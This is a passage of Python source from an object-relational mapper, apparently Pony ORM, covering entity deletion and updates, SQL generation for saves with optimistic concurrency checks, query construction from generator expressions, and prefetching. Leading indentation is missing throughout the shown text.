if val is None: continue
if attr.cascade_delete: val._delete_(undo_funcs)
elif not reverse.is_required: reverse.__set__(val, None, undo_funcs)
else: throw(ConstraintError, "Cannot delete object %s, because it has associated %s, "
"and 'cascade_delete' option of %s is not set"
% (obj, attr.name, attr))
elif isinstance(reverse, Set):
if attr not in obj._vals_: continue
val = get_val(attr)
if val is None: continue
reverse.reverse_remove((val,), obj, undo_funcs)
else: throw(NotImplementedError)
cache_indexes = cache.indexes
for attr in obj._simple_keys_:
val = get_val(attr)
if val is None: continue
cache_index = cache_indexes[attr]
obj2 = cache_index.pop(val)
assert obj2 is obj
undo_list.append((cache_index, val))
for attrs in obj._composite_keys_:
vals = tuple(get_val(attr) for attr in attrs)
if None in vals: continue
cache_index = cache_indexes[attrs]
obj2 = cache_index.pop(vals)
assert obj2 is obj
undo_list.append((cache_index, vals))
if status == 'created':
assert save_pos is not None
objects_to_save[save_pos] = None
obj._save_pos_ = None
obj._status_ = 'cancelled'
if obj._pkval_ is not None:
pk_index = cache_indexes[obj._pk_attrs_]
obj2 = pk_index.pop(obj._pkval_)
assert obj2 is obj
undo_list.append((pk_index, obj._pkval_))
else:
if status == 'modified':
assert save_pos is not None
objects_to_save[save_pos] = None
else:
assert status in ('loaded', 'inserted', 'updated')
assert save_pos is None
obj._save_pos_ = len(objects_to_save)
objects_to_save.append(obj)
obj._status_ = 'marked_to_delete'
cache.modified = True
except:
if not is_recursive_call:
for undo_func in reversed(undo_funcs): undo_func()
raise
@cut_traceback
def delete(obj):
cache = obj._session_cache_
if cache is None or not cache.is_alive: throw_db_session_is_over('delete object', obj)
obj._delete_()
@cut_traceback
def set(obj, **kwargs):
cache = obj._session_cache_
if cache is None or not cache.is_alive: throw_db_session_is_over('change object', obj)
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
with cache.flush_disabled():
avdict, collection_avdict = obj._keyargs_to_avdicts_(kwargs)
status = obj._status_
wbits = obj._wbits_
get_val = obj._vals_.get
objects_to_save = cache.objects_to_save
if avdict:
for attr in avdict:
if attr not in obj._vals_ and attr.reverse and not attr.reverse.is_collection:
attr.load(obj) # loading of one-to-one relations
if wbits is not None:
new_wbits = wbits
for attr in avdict: new_wbits |= obj._bits_[attr]
obj._wbits_ = new_wbits
if status != 'modified':
assert status in ('loaded', 'inserted', 'updated')
assert obj._save_pos_ is None
obj._status_ = 'modified'
obj._save_pos_ = len(objects_to_save)
objects_to_save.append(obj)
cache.modified = True
if not collection_avdict:
if not any(attr.reverse or attr.is_part_of_unique_index for attr in avdict):
obj._vals_.update(avdict)
return
for attr, value in items_list(avdict):
if value == get_val(attr):
avdict.pop(attr)
undo_funcs = []
undo = []
def undo_func():
obj._status_ = status
obj._wbits_ = wbits
if status in ('loaded', 'inserted', 'updated'):
assert objects_to_save
obj2 = objects_to_save.pop()
assert obj2 is obj and obj._save_pos_ == len(objects_to_save)
obj._save_pos_ = None
for cache_index, old_key, new_key in undo:
if new_key is not None: del cache_index[new_key]
if old_key is not None: cache_index[old_key] = obj
try:
for attr in obj._simple_keys_:
if attr not in avdict: continue
new_val = avdict[attr]
old_val = get_val(attr)
cache.update_simple_index(obj, attr, old_val, new_val, undo)
for attrs in obj._composite_keys_:
if any(attr in avdict for attr in attrs):
vals = [ get_val(a) for a in attrs ] # In Python 2 var name leaks into the function scope!
prev_vals = tuple(vals)
for i, attr in enumerate(attrs):
if attr in avdict: vals[i] = avdict[attr]
new_vals = tuple(vals)
cache.update_composite_index(obj, attrs, prev_vals, new_vals, undo)
for attr, new_val in iteritems(avdict):
if not attr.reverse: continue
old_val = get_val(attr)
attr.update_reverse(obj, old_val, new_val, undo_funcs)
for attr, new_val in iteritems(collection_avdict):
attr.__set__(obj, new_val, undo_funcs)
except:
for undo_func in undo_funcs: undo_func()
raise
obj._vals_.update(avdict)
def _keyargs_to_avdicts_(obj, kwargs):
avdict, collection_avdict = {}, {}
get_attr = obj._adict_.get
for name, new_val in kwargs.items():
attr = get_attr(name)
if attr is None: throw(TypeError, 'Unknown attribute %r' % name)
new_val = attr.validate(new_val, obj, from_db=False)
if attr.is_collection: collection_avdict[attr] = new_val
elif attr.pk_offset is None: avdict[attr] = new_val
elif obj._vals_.get(attr, new_val) != new_val:
throw(TypeError, 'Cannot change value of primary key attribute %s' % attr.name)
return avdict, collection_avdict
@classmethod
def _attrs_with_bit_(entity, attrs, mask=-1):
get_bit = entity._bits_.get
for attr in attrs:
if get_bit(attr) & mask: yield attr
def _construct_optimistic_criteria_(obj):
optimistic_columns = []
optimistic_converters = []
optimistic_values = []
optimistic_operations = []
for attr in obj._attrs_with_bit_(obj._attrs_with_columns_, obj._rbits_):
converters = attr.converters
assert converters
optimistic = attr.optimistic if attr.optimistic is not None else converters[0].optimistic
if not optimistic: continue
dbval = obj._dbvals_[attr]
optimistic_columns.extend(attr.columns)
optimistic_converters.extend(attr.converters)
values = attr.get_raw_values(dbval)
optimistic_values.extend(values)
optimistic_operations.extend('IS_NULL' if dbval is None else converter.EQ for converter in converters)
return optimistic_operations, optimistic_columns, optimistic_converters, optimistic_values
def _save_principal_objects_(obj, dependent_objects):
if dependent_objects is None: dependent_objects = []
elif obj in dependent_objects:
chain = ' -> '.join(obj2.__class__.__name__ for obj2 in dependent_objects)
throw(UnresolvableCyclicDependency, 'Cannot save cyclic chain: ' + chain)
dependent_objects.append(obj)
status = obj._status_
if status == 'created': attrs = obj._attrs_with_columns_
elif status == 'modified': attrs = obj._attrs_with_bit_(obj._attrs_with_columns_, obj._wbits_)
else: assert False # pragma: no cover
for attr in attrs:
if not attr.reverse: continue
val = obj._vals_[attr]
if val is not None and val._status_ == 'created':
val._save_(dependent_objects)
def _update_dbvals_(obj, after_create, new_dbvals):
bits = obj._bits_
vals = obj._vals_
dbvals = obj._dbvals_
cache_indexes = obj._session_cache_.indexes
for attr in obj._attrs_with_columns_:
if not bits.get(attr): continue
if attr not in vals: continue
val = vals[attr]
if attr.is_volatile:
if val is not None:
if attr.is_unique: cache_indexes[attr].pop(val, None)
get_val = vals.get
for key, i in attr.composite_keys:
keyval = tuple(get_val(attr) for attr in key)
cache_indexes[key].pop(keyval, None)
elif after_create and val is None:
obj._rbits_ &= ~bits[attr]
else:
if attr in new_dbvals:
dbvals[attr] = new_dbvals[attr]
continue
# Clear value of volatile attribute or null values after create, because the value may be changed in the DB
del vals[attr]
dbvals.pop(attr, None)
def _save_created_(obj):
auto_pk = (obj._pkval_ is None)
attrs = []
values = []
new_dbvals = {}
for attr in obj._attrs_with_columns_:
if auto_pk and attr.is_pk: continue
val = obj._vals_[attr]
if val is not None:
attrs.append(attr)
if not attr.reverse:
assert len(attr.converters) == 1
dbval = attr.converters[0].val2dbval(val, obj)
new_dbvals[attr] = dbval
values.append(dbval)
else:
new_dbvals[attr] = val
values.extend(attr.get_raw_values(val))
attrs = tuple(attrs)
database = obj._database_
cached_sql = obj._insert_sql_cache_.get(attrs)
if cached_sql is None:
columns = []
converters = []
for attr in attrs:
columns.extend(attr.columns)
converters.extend(attr.converters)
assert len(columns) == len(converters)
params = [ [ 'PARAM', (i, None, None), converter ] for i, converter in enumerate(converters) ]
entity = obj.__class__
if not columns and database.provider.dialect == 'Oracle':
sql_ast = [ 'INSERT', entity._table_, obj._pk_columns_,
[ [ 'DEFAULT' ] for column in obj._pk_columns_ ] ]
else: sql_ast = [ 'INSERT', entity._table_, columns, params ]
if auto_pk: sql_ast.append(entity._pk_columns_[0])
sql, adapter = database._ast2sql(sql_ast)
entity._insert_sql_cache_[attrs] = sql, adapter
else: sql, adapter = cached_sql
arguments = adapter(values)
try:
if auto_pk: new_id = database._exec_sql(sql, arguments, returning_id=True,
start_transaction=True)
else: database._exec_sql(sql, arguments, start_transaction=True)
except IntegrityError as e:
msg = " ".join(tostring(arg) for arg in e.args)
throw(TransactionIntegrityError,
'Object %r cannot be stored in the database. %s: %s'
% (obj, e.__class__.__name__, msg), e)
except DatabaseError as e:
msg = " ".join(tostring(arg) for arg in e.args)
throw(UnexpectedError, 'Object %r cannot be stored in the database. %s: %s'
% (obj, e.__class__.__name__, msg), e)
if auto_pk:
pk_attrs = obj._pk_attrs_
cache_index = obj._session_cache_.indexes[pk_attrs]
obj2 = cache_index.setdefault(new_id, obj)
if obj2 is not obj: throw(TransactionIntegrityError,
'Newly auto-generated id value %s was already used in transaction cache for another object' % new_id)
obj._pkval_ = obj._vals_[pk_attrs[0]] = new_id
obj._newid_ = None
obj._status_ = 'inserted'
obj._rbits_ = obj._all_bits_except_volatile_
obj._wbits_ = 0
obj._update_dbvals_(True, new_dbvals)
def _save_updated_(obj):
update_columns = []
values = []
new_dbvals = {}
for attr in obj._attrs_with_bit_(obj._attrs_with_columns_, obj._wbits_):
update_columns.extend(attr.columns)
val = obj._vals_[attr]
if not attr.reverse:
assert len(attr.converters) == 1
dbval = attr.converters[0].val2dbval(val, obj)
new_dbvals[attr] = dbval
values.append(dbval)
else:
new_dbvals[attr] = val
values.extend(attr.get_raw_values(val))
if update_columns:
for attr in obj._pk_attrs_:
val = obj._vals_[attr]
values.extend(attr.get_raw_values(val))
cache = obj._session_cache_
optimistic_session = cache.db_session is None or cache.db_session.optimistic
if optimistic_session and obj not in cache.for_update:
optimistic_ops, optimistic_columns, optimistic_converters, optimistic_values = \
obj._construct_optimistic_criteria_()
values.extend(optimistic_values)
else: optimistic_columns = optimistic_converters = optimistic_ops = ()
query_key = tuple(update_columns), tuple(optimistic_columns), tuple(optimistic_ops)
database = obj._database_
cached_sql = obj._update_sql_cache_.get(query_key)
if cached_sql is None:
update_converters = []
for attr in obj._attrs_with_bit_(obj._attrs_with_columns_, obj._wbits_):
update_converters.extend(attr.converters)
assert len(update_columns) == len(update_converters)
update_params = [ [ 'PARAM', (i, None, None), converter ] for i, converter in enumerate(update_converters) ]
params_count = len(update_params)
where_list = [ 'WHERE' ]
pk_columns = obj._pk_columns_
pk_converters = obj._pk_converters_
params_count = populate_criteria_list(where_list, pk_columns, pk_converters, repeat('EQ'), params_count)
if optimistic_columns: populate_criteria_list(
where_list, optimistic_columns, optimistic_converters, optimistic_ops, params_count, optimistic=True)
sql_ast = [ 'UPDATE', obj._table_, list(izip(update_columns, update_params)), where_list ]
sql, adapter = database._ast2sql(sql_ast)
obj._update_sql_cache_[query_key] = sql, adapter
else: sql, adapter = cached_sql
arguments = adapter(values)
cursor = database._exec_sql(sql, arguments, start_transaction=True)
if cursor.rowcount == 0 and cache.db_session.optimistic:
throw(OptimisticCheckError, obj.find_updated_attributes())
obj._status_ = 'updated'
obj._rbits_ |= obj._wbits_ & obj._all_bits_except_volatile_
obj._wbits_ = 0
obj._update_dbvals_(False, new_dbvals)
def _save_deleted_(obj):
values = []
values.extend(obj._get_raw_pkval_())
cache = obj._session_cache_
optimistic_session = cache.db_session is None or cache.db_session.optimistic
if optimistic_session and obj not in cache.for_update:
optimistic_ops, optimistic_columns, optimistic_converters, optimistic_values = \
obj._construct_optimistic_criteria_()
values.extend(optimistic_values)
else: optimistic_columns = optimistic_converters = optimistic_ops = ()
query_key = tuple(optimistic_columns), tuple(optimistic_ops)
database = obj._database_
cached_sql = obj._delete_sql_cache_.get(query_key)
if cached_sql is None:
where_list = [ 'WHERE' ]
params_count = populate_criteria_list(where_list, obj._pk_columns_, obj._pk_converters_, repeat('EQ'))
if optimistic_columns: populate_criteria_list(
where_list, optimistic_columns, optimistic_converters, optimistic_ops, params_count, optimistic=True)
from_ast = [ 'FROM', [ None, 'TABLE', obj._table_ ] ]
sql_ast = [ 'DELETE', None, from_ast, where_list ]
sql, adapter = database._ast2sql(sql_ast)
obj.__class__._delete_sql_cache_[query_key] = sql, adapter
else: sql, adapter = cached_sql
arguments = adapter(values)
cursor = database._exec_sql(sql, arguments, start_transaction=True)
if cursor.rowcount == 0 and cache.db_session.optimistic:
throw(OptimisticCheckError, obj.find_updated_attributes())
obj._status_ = 'deleted'
cache.indexes[obj._pk_attrs_].pop(obj._pkval_)
def find_updated_attributes(obj):
entity = obj.__class__
attrs_to_select = []
attrs_to_select.extend(entity._pk_attrs_)
discr = entity._discriminator_attr_
if discr is not None and discr.pk_offset is None:
attrs_to_select.append(discr)
for attr in obj._attrs_with_bit_(obj._attrs_with_columns_, obj._rbits_):
optimistic = attr.optimistic if attr.optimistic is not None else attr.converters[0].optimistic
if optimistic:
attrs_to_select.append(attr)
optimistic_converters = []
attr_offsets = {}
select_list = [ 'ALL' ]
for attr in attrs_to_select:
optimistic_converters.extend(attr.converters)
attr_offsets[attr] = offsets = []
for columns in attr.columns:
select_list.append([ 'COLUMN', None, columns])
offsets.append(len(select_list) - 2)
from_list = [ 'FROM', [ None, 'TABLE', entity._table_ ] ]
pk_columns = entity._pk_columns_
pk_converters = entity._pk_converters_
criteria_list = [ [ converter.EQ, [ 'COLUMN', None, column ], [ 'PARAM', (i, None, None), converter ] ]
for i, (column, converter) in enumerate(izip(pk_columns, pk_converters)) ]
sql_ast = [ 'SELECT', select_list, from_list, [ 'WHERE' ] + criteria_list ]
database = entity._database_
sql, adapter = database._ast2sql(sql_ast)
arguments = adapter(obj._get_raw_pkval_())
cursor = database._exec_sql(sql, arguments)
row = cursor.fetchone()
if row is None:
return "Object %s was deleted outside of current transaction" % safe_repr(obj)
real_entity_subclass, pkval, avdict = entity._parse_row_(row, attr_offsets)
diff = []
for attr, new_dbval in avdict.items():
old_dbval = obj._dbvals_[attr]
converter = attr.converters[0]
if old_dbval != new_dbval and (
attr.reverse or not converter.dbvals_equal(old_dbval, new_dbval)):
diff.append('%s (%r -> %r)' % (attr.name, old_dbval, new_dbval))
return "Object %s was updated outside of current transaction%s" % (
safe_repr(obj), ('. Changes: %s' % ', '.join(diff) if diff else ''))
def _save_(obj, dependent_objects=None):
status = obj._status_
if status in ('created', 'modified'):
obj._save_principal_objects_(dependent_objects)
if status == 'created': obj._save_created_()
elif status == 'modified': obj._save_updated_()
elif status == 'marked_to_delete': obj._save_deleted_()
else: assert False, "_save_() called for object %r with incorrect status %s" % (obj, status) # pragma: no cover
assert obj._status_ in saved_statuses
cache = obj._session_cache_
assert cache is not None and cache.is_alive
cache.saved_objects.append((obj, obj._status_))
objects_to_save = cache.objects_to_save
save_pos = obj._save_pos_
if save_pos == len(objects_to_save) - 1:
objects_to_save.pop()
else:
objects_to_save[save_pos] = None
obj._save_pos_ = None
def flush(obj):
if obj._status_ not in ('created', 'modified', 'marked_to_delete'):
return
assert obj._save_pos_ is not None, 'save_pos is None for %s object' % obj._status_
cache = obj._session_cache_
assert cache is not None and cache.is_alive and not cache.saved_objects
with cache.flush_disabled():
obj._before_save_() # should be inside flush_disabled to prevent infinite recursion
# TODO: add to documentation that flush is disabled inside before_xxx hooks
obj._save_()
cache.call_after_save_hooks()
def _before_save_(obj):
status = obj._status_
if status == 'created': obj.before_insert()
elif status == 'modified': obj.before_update()
elif status == 'marked_to_delete': obj.before_delete()
def before_insert(obj):
pass
def before_update(obj):
pass
def before_delete(obj):
pass
def _after_save_(obj, status):
if status == 'inserted': obj.after_insert()
elif status == 'updated': obj.after_update()
elif status == 'deleted': obj.after_delete()
def after_insert(obj):
pass
def after_update(obj):
pass
def after_delete(obj):
pass
@cut_traceback
def to_dict(obj, only=None, exclude=None, with_collections=False, with_lazy=False, related_objects=False):
cache = obj._session_cache_
if cache is not None and cache.is_alive and cache.modified: cache.flush()
attrs = obj.__class__._get_attrs_(only, exclude, with_collections, with_lazy)
result = {}
for attr in attrs:
value = attr.__get__(obj)
if attr.is_collection:
if related_objects: value = sorted(value)
elif len(attr.reverse.entity._pk_columns_) > 1:
value = sorted(item._get_raw_pkval_() for item in value)
else: value = sorted(item._get_raw_pkval_()[0] for item in value)
elif attr.is_relation and not related_objects and value is not None:
value = value._get_raw_pkval_()
if len(value) == 1: value = value[0]
result[attr.name] = value
return result
def to_json(obj, include=(), exclude=(), converter=None, with_schema=True, schema_hash=None):
return obj._database_.to_json(obj, include, exclude, converter, with_schema, schema_hash)
def string2ast(s):
result = string2ast_cache.get(s)
if result is not None: return result
if PY2:
if isinstance(s, str):
try: s.encode('ascii')
except UnicodeDecodeError: throw(TypeError,
'The bytestring %r contains non-ascii symbols. Try to pass unicode string instead' % s)
else: s = s.encode('ascii', 'backslashreplace')
module_node = parse('(%s)' % s)
if not isinstance(module_node, ast.Module): throw(TypeError)
stmt_node = module_node.node
if not isinstance(stmt_node, ast.Stmt) or len(stmt_node.nodes) != 1: throw(TypeError)
discard_node = stmt_node.nodes[0]
if not isinstance(discard_node, ast.Discard): throw(TypeError)
result = string2ast_cache[s] = discard_node.expr
# result = deepcopy(result) # no need for now, but may be needed later
return result
def get_globals_and_locals(args, kwargs, frame_depth, from_generator=False):
args_len = len(args)
assert args_len > 0
func = args[0]
if from_generator:
if not isinstance(func, (basestring, types.GeneratorType)): throw(TypeError,
'The first positional argument must be generator expression or its text source. Got: %r' % func)
else:
if not isinstance(func, (basestring, types.FunctionType)): throw(TypeError,
'The first positional argument must be lambda function or its text source. Got: %r' % func)
if args_len > 1:
globals = args[1]
if not hasattr(globals, 'keys'): throw(TypeError,
'The second positional arguments should be globals dictionary. Got: %r' % globals)
if args_len > 2:
locals = args[2]
if local is not None and not hasattr(locals, 'keys'): throw(TypeError,
'The third positional arguments should be locals dictionary. Got: %r' % locals)
else: locals = {}
if type(func) is types.GeneratorType:
locals = locals.copy()
locals.update(func.gi_frame.f_locals)
if len(args) > 3: throw(TypeError, 'Excess positional argument%s: %s'
% (len(args) > 4 and 's' or '', ', '.join(imap(repr, args[3:]))))
else:
locals = {}
if frame_depth is not None:
locals.update(sys._getframe(frame_depth+1).f_locals)
if type(func) is types.GeneratorType:
globals = func.gi_frame.f_globals
locals.update(func.gi_frame.f_locals)
elif frame_depth is not None:
globals = sys._getframe(frame_depth+1).f_globals
if kwargs: throw(TypeError, 'Keyword arguments cannot be specified together with positional arguments')
return func, globals, locals
def make_query(args, frame_depth, left_join=False):
gen, globals, locals = get_globals_and_locals(
args, kwargs=None, frame_depth=frame_depth+1 if frame_depth is not None else None, from_generator=True)
if isinstance(gen, types.GeneratorType):
tree, external_names, cells = decompile(gen)
code_key = id(gen.gi_frame.f_code)
elif isinstance(gen, basestring):
tree = string2ast(gen)
if not isinstance(tree, ast.GenExpr): throw(TypeError,
'Source code should represent generator. Got: %s' % gen)
code_key = gen
cells = None
else: assert False
return Query(code_key, tree.code, globals, locals, cells, left_join)
@cut_traceback
def select(*args):
return make_query(args, frame_depth=cut_traceback_depth+1)
@cut_traceback
def left_join(*args):
return make_query(args, frame_depth=cut_traceback_depth+1, left_join=True)
@cut_traceback
def get(*args):
return make_query(args, frame_depth=cut_traceback_depth+1).get()
@cut_traceback
def exists(*args):
return make_query(args, frame_depth=cut_traceback_depth+1).exists()
@cut_traceback
def delete(*args):
return make_query(args, frame_depth=cut_traceback_depth+1).delete()
def make_aggrfunc(std_func):
def aggrfunc(*args, **kwargs):
if not args:
return std_func(**kwargs)
arg = args[0]
if type(arg) is types.GeneratorType:
try: iterator = arg.gi_frame.f_locals['.0']
except: return std_func(*args, **kwargs)
if isinstance(iterator, EntityIter):
return getattr(select(arg), std_func.__name__)(*args[1:], **kwargs)
return std_func(*args, **kwargs)
aggrfunc.__name__ = std_func.__name__
return aggrfunc
count = make_aggrfunc(utils.count)
sum = make_aggrfunc(builtins.sum)
min = make_aggrfunc(builtins.min)
max = make_aggrfunc(builtins.max)
avg = make_aggrfunc(utils.avg)
group_concat = make_aggrfunc(utils.group_concat)
distinct = make_aggrfunc(utils.distinct)
def JOIN(expr):
return expr
def desc(expr):
if isinstance(expr, Attribute):
return expr.desc
if isinstance(expr, DescWrapper):
return expr.attr
if isinstance(expr, int_types):
return -expr
if isinstance(expr, basestring):
return 'desc(%s)' % expr
return expr
def raw_sql(sql, result_type=None):
globals = sys._getframe(1).f_globals
locals = sys._getframe(1).f_locals
return RawSQL(sql, globals, locals, result_type)
def extract_vars(code_key, filter_num, extractors, globals, locals, cells=None):
if cells:
locals = locals.copy()
for name, cell in cells.items():
try:
locals[name] = cell.cell_contents
except ValueError:
throw(NameError, 'Free variable `%s` referenced before assignment in enclosing scope' % name)
vars = {}
vartypes = HashableDict()
for src, extractor in iteritems(extractors):
varkey = filter_num, src, code_key
try: value = extractor(globals, locals)
except Exception as cause: raise ExprEvalError(src, cause)
if isinstance(value, types.GeneratorType):
value = make_query((value,), frame_depth=None)
if isinstance(value, QueryResultIterator):
qr = value._query_result
value = qr if not qr._items else tuple(qr._items[value._position:])
if isinstance(value, QueryResult) and value._items:
value = tuple(value._items)
if isinstance(value, (Query, QueryResult)):
query = value._query if isinstance(value, QueryResult) else value
vars.update(query._vars)
vartypes.update(query._translator.vartypes)
if src == 'None' and value is not None: throw(TranslationError)
if src == 'True' and value is not True: throw(TranslationError)
if src == 'False' and value is not False: throw(TranslationError)
try: vartypes[varkey], value = normalize(value)
except TypeError:
if not isinstance(value, dict):
unsupported = False
try: value = tuple(value)
except: unsupported = True
else: unsupported = True
if unsupported:
typename = type(value).__name__
if src == '.0':
throw(TypeError, 'Query cannot iterate over anything but entity class or another query')
throw(TypeError, 'Expression `%s` has unsupported type %r' % (src, typename))
vartypes[varkey], value = normalize(value)
vars[varkey] = value
return vars, vartypes
def unpickle_query(query_result):
return query_result
class Query(object):
def __init__(query, code_key, tree, globals, locals, cells=None, left_join=False):
assert isinstance(tree, ast.GenExprInner)
tree, extractors = create_extractors(code_key, tree, globals, locals, special_functions, const_functions)
filter_num = 0
vars, vartypes = extract_vars(code_key, filter_num, extractors, globals, locals, cells)
node = tree.quals[0].iter
varkey = filter_num, node.src, code_key
origin = vars[varkey]
if isinstance(origin, Query):
prev_query = origin
elif isinstance(origin, QueryResult):
prev_query = origin._query
elif isinstance(origin, QueryResultIterator):
prev_query = origin._query_result._query
else:
prev_query = None
if not isinstance(origin, EntityMeta):
if node.src == '.0': throw(TypeError,
'Query can only iterate over entity or another query (not a list of objects)')
throw(TypeError, 'Cannot iterate over non-entity object %s' % node.src)
database = origin._database_
if database is None: throw(TranslationError, 'Entity %s is not mapped to a database' % origin.__name__)
if database.schema is None: throw(ERDiagramError, 'Mapping is not generated for entity %r' % origin.__name__)
if prev_query is not None:
database = prev_query._translator.database
filter_num = prev_query._filter_num + 1
vars, vartypes = extract_vars(code_key, filter_num, extractors, globals, locals, cells)
query._filter_num = filter_num
database.provider.normalize_vars(vars, vartypes)
query._code_key = code_key
query._key = HashableDict(code_key=code_key, vartypes=vartypes, left_join=left_join, filters=())
query._database = database
translator, vars = query._get_translator(query._key, vars)
query._vars = vars
if translator is None:
pickled_tree = pickle_ast(tree)
tree_copy = unpickle_ast(pickled_tree) # tree = deepcopy(tree)
translator_cls = database.provider.translator_cls
try:
translator = translator_cls(tree_copy, None, code_key, filter_num, extractors, vars, vartypes.copy(), left_join=left_join)
except UseAnotherTranslator as e:
translator = e.translator
name_path = translator.can_be_optimized()
if name_path:
tree_copy = unpickle_ast(pickled_tree) # tree = deepcopy(tree)
try:
translator = translator_cls(tree_copy, None, code_key, filter_num, extractors, vars, vartypes.copy(),
left_join=True, optimize=name_path)
except UseAnotherTranslator as e:
translator = e.translator
except OptimizationFailed:
translator.optimization_failed = True
translator.pickled_tree = pickled_tree
if translator.can_be_cached:
database._translator_cache[query._key] = translator
query._translator = translator
query._filters = ()
query._next_kwarg_id = 0
query._for_update = query._nowait = False
query._distinct = None
query._prefetch = False
query._entities_to_prefetch = set()
query._attrs_to_prefetch_dict = defaultdict(set)
def _get_type_(query):
return QueryType(query)
def _normalize_var(query, query_type):
return query_type, query
def _clone(query, **kwargs):
new_query = object.__new__(Query)
new_query.__dict__.update(query.__dict__)
new_query.__dict__.update(kwargs)
return new_query
def __reduce__(query):
return unpickle_query, (query._fetch(),)
def _get_translator(query, query_key, vars):
new_vars = vars.copy()
database = query._database
translator = database._translator_cache.get(query_key)
all_func_vartypes = {}
if translator is not None:
if translator.func_extractors_map:
for func, func_extractors in iteritems(translator.func_extractors_map):
func_id = id(func.func_code if PY2 else func.__code__)
func_filter_num = translator.filter_num, 'func', func_id
func_vars, func_vartypes = extract_vars(
func_id, func_filter_num, func_extractors, func.__globals__, {}, func.__closure__) # todo closures
database.provider.normalize_vars(func_vars, func_vartypes)
new_vars.update(func_vars)
all_func_vartypes.update(func_vartypes)
if all_func_vartypes != translator.func_vartypes:
return None, vars.copy()
for key, attrname in iteritems(translator.getattr_values):
assert key in new_vars
if attrname != new_vars[key]:
del database._translator_cache[query_key]
return None, vars.copy()
return translator, new_vars
def _construct_sql_and_arguments(query, limit=None, offset=None, range=None, aggr_func_name=None, aggr_func_distinct=None, sep=None):
translator = query._translator
expr_type = translator.expr_type
if isinstance(expr_type, EntityMeta) and query._attrs_to_prefetch_dict:
attrs_to_prefetch = tuple(sorted(query._attrs_to_prefetch_dict.get(expr_type, ())))
else:
attrs_to_prefetch = ()
sql_key = HashableDict(
query._key,
vartypes=HashableDict(query._translator.vartypes),
getattr_values=HashableDict(translator.getattr_values),
limit=limit,
offset=offset,
distinct=query._distinct,
aggr_func=(aggr_func_name, aggr_func_distinct, sep),
for_update=query._for_update,
nowait=query._nowait,
inner_join_syntax=options.INNER_JOIN_SYNTAX,
attrs_to_prefetch=attrs_to_prefetch
)
database = query._database
cache_entry = database._constructed_sql_cache.get(sql_key)
if cache_entry is None:
sql_ast, attr_offsets = translator.construct_sql_ast(
limit, offset, query._distinct, aggr_func_name, aggr_func_distinct, sep,
query._for_update, query._nowait, attrs_to_prefetch)
cache = database._get_cache()
sql, adapter = database.provider.ast2sql(sql_ast)
cache_entry = sql, adapter, attr_offsets
database._constructed_sql_cache[sql_key] = cache_entry
else: sql, adapter, attr_offsets = cache_entry
arguments = adapter(query._vars)
if query._translator.query_result_is_cacheable:
arguments_key = HashableDict(arguments) if type(arguments) is dict else arguments
try: hash(arguments_key)
except: query_key = None # arguments are unhashable
else: query_key = HashableDict(sql_key, arguments_key=arguments_key)
else: query_key = None
return sql, arguments, attr_offsets, query_key
def get_sql(query):
sql, arguments, attr_offsets, query_key = query._construct_sql_and_arguments()
return sql
def _actual_fetch(query, limit=None, offset=None):
translator = query._translator
sql, arguments, attr_offsets, query_key = query._construct_sql_and_arguments(limit, offset)
database = query._database
cache = database._get_cache()
if query._for_update: cache.immediate = True
cache.prepare_connection_for_query_execution() # may clear cache.query_results
items = cache.query_results.get(query_key)
if items is None:
cursor = database._exec_sql(sql, arguments)
if isinstance(translator.expr_type, EntityMeta):
entity = translator.expr_type
items = entity._fetch_objects(cursor, attr_offsets, for_update=query._for_update,
used_attrs=translator.get_used_attrs())
elif len(translator.row_layout) == 1:
func, slice_or_offset, src = translator.row_layout[0]
items = list(starmap(func, cursor.fetchall()))
else:
items = [ tuple(func(sql_row[slice_or_offset])
for func, slice_or_offset, src in translator.row_layout)
for sql_row in cursor.fetchall() ]
for i, t in enumerate(translator.expr_type):
if isinstance(t, EntityMeta) and t._subclasses_: t._load_many_(row[i] for row in items)
if query_key is not None: cache.query_results[query_key] = items
else:
stats = database._dblocal.stats
stat = stats.get(sql)
if stat is not None: stat.cache_count += 1
else: stats[sql] = QueryStat(sql)
if query._prefetch: query._do_prefetch(items)
return items
@cut_traceback
def prefetch(query, *args):
query = query._clone(_entities_to_prefetch=query._entities_to_prefetch.copy(),
_attrs_to_prefetch_dict=query._attrs_to_prefetch_dict.copy())
query._prefetch = True
for arg in args:
if isinstance(arg, EntityMeta):
entity = arg
if query._database is not entity._database_: throw(TypeError,
'Entity %s belongs to different database and cannot be prefetched' % entity.__name__)
query._entities_to_prefetch.add(entity)
elif isinstance(arg, Attribute):
attr = arg
entity = attr.entity
if query._database is not entity._database_: throw(TypeError,
'Entity of attribute %s belongs to different database and cannot be prefetched' % attr)
if isinstance(attr.py_type, EntityMeta) or attr.lazy:
query._attrs_to_prefetch_dict[entity].add(attr)
else: throw(TypeError, 'Argument of prefetch() query method must be entity class or attribute. '
'Got: %r' % arg)
return query
def _do_prefetch(query, result):
expr_type = query._translator.expr_type
object_list = []
object_set = set()
append_to_object_list = object_list.append
add_to_object_set = object_set.add
if isinstance(expr_type, EntityMeta):
for obj in result:
if obj not in object_set:
add_to_object_set(obj)
append_to_object_list(obj)
elif type(expr_type) is tuple:
for i, t in enumerate(expr_type):
if not isinstance(t, EntityMeta): continue
for row in result:
obj = row[i]
if obj not in object_set:
add_to_object_set(obj)
append_to_object_list(obj)
cache = query._database._get_cache()
entities_to_prefetch = query._entities_to_prefetch
attrs_to_prefetch_dict = query._attrs_to_prefetch_dict
prefetching_attrs_cache = {}
for obj in object_list:
entity = obj.__class__
if obj in cache.seeds[entity._pk_attrs_]: obj._load_()
all_attrs_to_prefetch = prefetching_attrs_cache.get(entity)
if all_attrs_to_prefetch is None:
all_attrs_to_prefetch = []
append = all_attrs_to_prefetch.append
attrs_to_prefetch = attrs_to_prefetch_dict[entity]
for attr in obj._attrs_:
if attr.is_collection:
if attr in attrs_to_prefetch: append(attr)
elif attr.is_relation:
if attr in attrs_to_prefetch or attr.py_type in entities_to_prefetch: append(attr)
elif attr.lazy:
if attr in attrs_to_prefetch: append(attr)
prefetching_attrs_cache[entity] = all_attrs_to_prefetch
for attr in all_attrs_to_prefetch:
if attr.is_collection:
if not isinstance(attr, Set): throw(NotImplementedError)
setdata = obj._vals_.get(attr)
if setdata is None or not setdata.is_fully_loaded: setdata = attr.load(obj)
for obj2 in setdata:
if obj2 not in object_set:
add_to_object_set(obj2)
append_to_object_list(obj2)
elif attr.is_relation:
obj2 = attr.get(obj)
if obj2 is not None and obj2 not in object_set:
add_to_object_set(obj2)
append_to_object_list(obj2)
elif attr.lazy: attr.get(obj)
else: assert False # pragma: no cover
@cut_traceback
def show(query, width=None):
